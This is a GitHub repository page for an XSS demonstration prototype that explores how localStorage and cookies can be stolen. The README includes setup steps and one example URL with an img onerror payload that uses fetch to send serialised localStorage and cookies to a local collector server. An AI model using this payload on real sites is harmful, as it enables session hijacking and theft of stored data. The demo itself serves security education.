Skip to content
/ xss-attack-prototype Public

Exploring the limits of XSS vulnerability regarding localstorage and cookies

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

CatalinScaesteanu/xss-attack-prototype

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
attacks
attacks
 
 
client
client
 
 
server
server
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 

Repository files navigation

How to use

Server

In the project directory server, you can run:

npm start

The server listens on port 3001

Client

In the project directory client, you can run:

npm start

Open http://localhost:3000 to view it in the browser.

Example attack:

http://localhost:3000/?text=<img src onerror="fetch(`http://localhost:3001?localStorage=${JSON.stringify(localStorage)}&cookie=${JSON.stringify(document.cookie)}`).then(data => data.json()).then(data => console.log('server response', data))" />

Check console for the response from server

Conclusion

Both localstorage and cookies are vulnerable in about the same severity. Be careful what data you store in them :)

About

Exploring the limits of XSS vulnerability regarding localstorage and cookies

Topics

nodejs javascript cookies

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages